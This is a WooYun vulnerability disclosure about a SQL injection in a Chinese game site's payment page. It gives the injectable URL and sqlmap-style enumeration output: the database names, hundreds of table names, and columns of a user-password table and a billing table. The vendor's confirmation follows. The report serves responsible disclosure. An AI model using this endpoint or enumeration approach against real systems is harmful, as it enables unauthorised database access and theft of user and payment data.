当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-067352

漏洞标题:浙江印象充值页面sql注入漏洞

相关厂商:jhreal.com

漏洞作者: jaffer

提交时间:2014-07-04 11:42

修复时间:2014-08-18 11:46

公开时间:2014-08-18 11:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-04: 细节已通知厂商并且等待厂商处理中
2014-07-04: 厂商已经确认,细节仅向厂商公开
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-18: 细节向公众公开

简要描述:

rt

详细说明:

注入点:

http://pay.5see.com/Pay/LyPay?gameid=wycq


数据库:

available databases [3]:
[*] information_schema
[*] test
[*] vxgametv


Database: vxgametv
[390 tables]
+---------------------------------+
| ad_gun_list                     |
| admin_login_log                 |
| admin_rollback                  |
| admindonelog                    |
| admindonetype                   |
| agent_bill                      |
| agent_chongka_ticheng           |
| agent_login_log                 |
| agent_moneylog                  |
| agent_ticheng_pay_list          |
| agent_zhuchi                    |
| agenttichengtype                |
| auth_auser                      |
| auth_auser_bk                   |
| auth_group                      |
| auth_group_permissions          |
| auth_message                    |
| auth_permission                 |
| auth_session                    |
| auth_session_log                |
| auth_session_log_old            |
| auth_session_stat               |
| auth_session_stat_0615          |
| auth_session_view               |
| auth_session_view_basic         |
| auth_user                       |
| auth_user_groups                |
| auth_user_user_permissions      |
| b_advice                        |
| b_re_advice                     |
| bank_list_05                    |
| bankcoin_log_stat               |
| bill                            |
| bill_waika                      |
| blackmyname                     |
| card_agent                      |
| card_agent_getback_bklist       |
| cardlogin_log                   |
| cards                           |
| cards_changename                |
| cards_cread_log                 |
| cards_event                     |
| cards_list_100                  |
| cards_list_1000                 |
| cards_list_500                  |
| cards_list_vip                  |
| cards_product                   |
| cards_storage                   |
| cards_storage_log               |
| cargame_tj                      |
| cargame_tj_old                  |
| carrobot_list                   |
| category                        |
| chargesubmit                    |
| chargesubmit_waika              |
| chatavatar                      |
| coin_control_otherthing         |
| coin_jifen_statistics           |
| coin_log_stat                   |
| coin_score_daily                |
| coinauth                        |
| cross_online_stat               |
| ddlchangelog                    |
| django_content_type             |
| django_session                  |
| django_site                     |
| dynaic_page                     |
| egg_config                      |
| egg_config_gift_list            |
| egg_degree_level                |
| egg_eventscore                  |
| egg_get_log                     |
| egg_gift_list                   |
| egg_hit_log                     |
| egg_owner                       |
| error_log                       |
| event1_chooseteams              |
| event1_teamgroups               |
| event1_teams                    |
| event_awardlist                 |
| event_dance_list                |
| event_dance_list_log            |
| event_list                      |
| event_lottery                   |
| event_survey                    |
| event_type                      |
| event_yuanxiao                  |
| exchange                        |
| exchange2                       |
| exchange_old                    |
| exchange_old_140408             |
| exchangetime                    |
| filter                          |
| flash                           |
| flashclass                      |
| flashgame                       |
| game_gifts                      |
| game_intro_admin                |
| game_intro_list                 |
| game_intro_pay_list             |
| game_intro_task                 |
| game_intro_uid_log              |
| game_intro_uid_temp             |
| game_pay_rate_list              |
| game_server_list                |
| game_stat                       |
| game_uid_ip_list                |
| gamenotices                     |
| gamenotices_type                |
| gj_member                       |
| gmtv_board                      |
| gmtv_members                    |
| gmtv_room_ad                    |
| gmtv_room_favorites             |
| gmtv_room_group                 |
| gmtv_room_link_group            |
| gmtv_room_sign                  |
| gmtv_server_config              |
| gmtv_update                     |
| gmtv_update2                    |
| gmtv_user_stat                  |
| gmtvbankcoin                    |
| gmtvbankcoinlog                 |
| gmtvcoin                        |
| gmtvcoinlog                     |
| gmtvcoinlog_05_bk               |
| gmtvcoinlog_1304                |
| gmtvdegree                      |
| gmtvdegreelog                   |
| gmtvniuniuscore                 |
| gmtvniuniuscorelog              |
| gmtvroomcoin                    |
| gmtvroomcoinlog                 |
| gmtvroomscore1303               |
| gmtvroomscore1303log            |
| gmtvroomscore1304               |
| gmtvroomscore1304log            |
| gmtvroomscore1305               |
| gmtvroomscore1305log            |
| gmtvroomscore1306               |
| gmtvroomscore1306log            |
| gmtvroomscore1307               |
| gmtvroomscore1307log            |
| gmtvroomscore1308               |
| gmtvroomscore1308log            |
| gmtvroomscore1309               |
| gmtvroomscore1309log            |
| gmtvroomscore1310               |
| gmtvroomscore1310log            |
| gmtvroomscore1311               |
| gmtvroomscore1311log            |
| gmtvroomscore1312               |
| gmtvroomscore1312log            |
| gmtvroomscore1401               |
| gmtvroomscore1401log            |
| gmtvroomscore1402               |
| gmtvroomscore1402log            |
| gmtvroomscore1403               |
| gmtvroomscore1403log            |
| gmtvroomscore1404               |
| gmtvroomscore1404log            |
| gmtvroomscore1405               |
| gmtvroomscore1405log            |
| gmtvroomscore1406               |
| gmtvroomscore1406log            |
| gmtvroomscore1407               |
| gmtvroomscore1407log            |
| gmtvroomscore1408               |
| gmtvroomscore1408log            |
| gmtvroomscore1409               |
| gmtvroomscore1409log            |
| gmtvroomscore1410               |
| gmtvroomscore1410log            |
| gmtvroomscore1411               |
| gmtvroomscore1411log            |
| gmtvroomscore1412               |
| gmtvroomscore1412log            |
| gmtvscore                       |
| gmtvscorelog                    |
| help                            |
| help_class                      |
| host_award_type                 |
| host_aword_player               |
| host_player_sign_up             |
| host_score                      |
| host_score_item                 |
| host_vote                       |
| ht_page_login_list              |
| ht_pay_list                     |
| ht_tui_statistic_list           |
| ip_merge                        |
| ktv_board                       |
| ktv_members                     |
| ktv_room_ad                     |
| ktv_room_favorites              |
| ktv_room_group                  |
| ktv_room_link_group             |
| ktv_room_sign                   |
| ktv_room_type                   |
| ktv_room_type_relevance         |
| ktv_server_config               |
| ktv_update                      |
| ktv_update2                     |
| ktv_user_stat                   |
| ktvrooms                        |
| link                            |
| liveroom                        |
| lockinfo                        |
| ly_enabled_ip                   |
| ly_game_cards                   |
| ly_game_playlog                 |
| ly_game_servers                 |
| ly_games                        |
| member                          |
| member_131218                   |
| member_blockip                  |
| member_blockipsegment           |
| member_cert                     |
| member_changescore_log          |
| member_coin_score_sum_month     |
| member_consumepoint             |
| member_daheng_details           |
| member_daixin_zhuchi            |
| member_device                   |
| member_device_more              |
| member_index_tj                 |
| member_intro_0709               |
| member_intro_ly_0621            |
| member_introducer               |
| member_introducer_log           |
| member_introducer_login_log     |
| member_introducer_placeid_ratio |
| member_introducer_temp_t0       |
| member_level_type               |
| member_login_room               |
| member_masterscore_bk           |
| member_money_day_list           |
| member_not_display              |
| member_null_cnt                 |
| member_own                      |
| member_phoneqqsina              |
| member_qq                       |
| member_registerip               |
| member_robot                    |
| member_scorelog                 |
| member_site_level               |
| member_statistics               |
| member_statistics_zhuchi        |
| member_test                     |
| member_than1700                 |
| member_tui_admin                |
| member_tuistatistics            |
| member_tuistatistics2           |
| member_tuistatistics_not_ratio  |
| member_tuistatisticste          |
| member_tuistatisticste2         |
| member_updengji_stat            |
| member_usedcard_record          |
| member_usedcard_record_month    |
| member_useddate                 |
| member_zhuchi                   |
| member_zhuchi_details           |
| membercheackip                  |
| menu1                           |
| menuright1                      |
| mm_admin                        |
| mm_album                        |
| mm_album_good                   |
| mm_albumcomment                 |
| mm_albumreply                   |
| mm_auser_list                   |
| mm_category                     |
| mm_follow                       |
| mm_guestbook                    |
| mm_guestbookreply               |
| mm_info                         |
| mm_mood                         |
| mm_moodcomment                  |
| mm_moodcomment_reply            |
| mm_photo                        |
| mm_show_album                   |
| mm_show_banner                  |
| mm_show_user                    |
| mm_uservisited                  |
| multiroom                       |
| multiroom1                      |
| multiroom_renqi                 |
| multiroom_statistics_new        |
| ngame_authoperates              |
| ngame_games                     |
| ngame_gameservers               |
| ngame_gametypes                 |
| ngame_introinfo                 |
| ngame_introtuiguang             |
| ngame_introtuigurl              |
| ngame_introtype                 |
| ngame_introusers                |
| ngame_managers                  |
| ngame_menugroups                |
| ngame_menus                     |
| ngame_normalusers               |
| ngame_rolepowers                |
| ngame_roles                     |
| ngame_ticdetail                 |
| ngame_ticscheme                 |
| notice                          |
| notice_type                     |
| number_segment                  |
| pay_cards                       |
| pay_cards_log                   |
| pay_cards_stat                  |
| pay_cards_type                  |
| pay_channel                     |
| pay_channel_use                 |
| pay_coin                        |
| pay_list                        |
| pay_list_1401                   |
| pay_list_xs                     |
| pay_monthly                     |
| pay_monthly_log                 |
| pay_type                        |
| phone_advs                      |
| plat_event_list                 |
| plat_event_nangua               |
| plat_events                     |
| platform                        |
| qianmoneylog                    |
| real_exchange                   |
| real_returnchangecode           |
| real_returncode                 |
| remotelog_application           |
| remotelog_logmessage            |
| rooms_popularity_day            |
| rpt_cards_daily                 |
| rvdb_member                     |
| saleusers                       |
| score_log_stat                  |
| seee_room_group                 |
| seee_room_link_group            |
| seee_server_config              |
| servers                         |
| shengzhouxing_bill              |
| siting_config                   |
| sqlmapoutput                    |
| st_applist                      |
| st_apptypes                     |
| st_default_event                |
| st_platforms                    |
| st_user_event                   |
| statistic_platform              |
| sys_monitorchangelog            |
| sysdiagrams                     |
| syslog                          |
| system_admin                    |
| system_adminpermissions         |
| system_creaduser_log            |
| system_menufather               |
| system_permissions              |
| tableidcontrol                  |
| tableidcontrol_game             |
| tb_pro_city                     |
| tb_sales_detail                 |
| tehao                           |
| tehao_new                       |
| tehao_vip_yin                   |
| temp_lydd                       |
| temp_psdid                      |
| tenroom_userinfo                |
| tg_qq_url_list                  |
| tip_client                      |
| tmp2                            |
| tmp_active_zc                   |
| tmp_active_zc2                  |
| tmp_coinless100                 |
| tmp_coinless100_group           |
| tmp_shell                       |
| tmp_shell2                      |
| trade_recover_log               |
| tui_zhuang_log                  |
| tuigliveroom                    |
| u766_room_group                 |
| u766_room_link_group            |
| u766_server_config              |
| user_block_reason               |
| user_frver_list                 |
| user_machine                    |
| user_machine_block              |
| v_introusers                    |
| zhuchi_score_month              |
| zhuchi_shelldaystatistic        |
+---------------------------------+


某几张表:

Database: vxgametv
Table: member_qq
[5 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| createtime | timestamp   |
| pwd        | varchar(64) |
| qqopenid   | varchar(32) |
| src_type   | varchar(20) |
| useridx    | bigint(22)  |
+------------+-------------+


Database: vxgametv
Table: bill
[13 columns]
+----------+---------------+
| Column   | Type          |
+----------+---------------+
| Amount   | decimal(18,2) |
| b_id     | int(11)       |
| billno   | varchar(50)   |
| cardtype | varchar(10)   |
| coin     | bigint(20)    |
| date     | char(14)      |
| kbillno  | varchar(30)   |
| masterid | varchar(20)   |
| Memo     | varchar(255)  |
| paydate  | datetime      |
| PayWay   | varchar(20)   |
| succ     | varchar(1)    |
| UserID   | varchar(20)   |
+----------+---------------+

漏洞证明:

只是做了一下测试。

14.jpg


111.jpg


信息太多了,你们赶快修复吧。不然问题可就大了。

修复方案:

版权声明:转载请注明来源 jaffer@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-07-04 12:13

厂商回复:

已经提交相关人员修改,对注入一直没有重视

最新状态:

暂无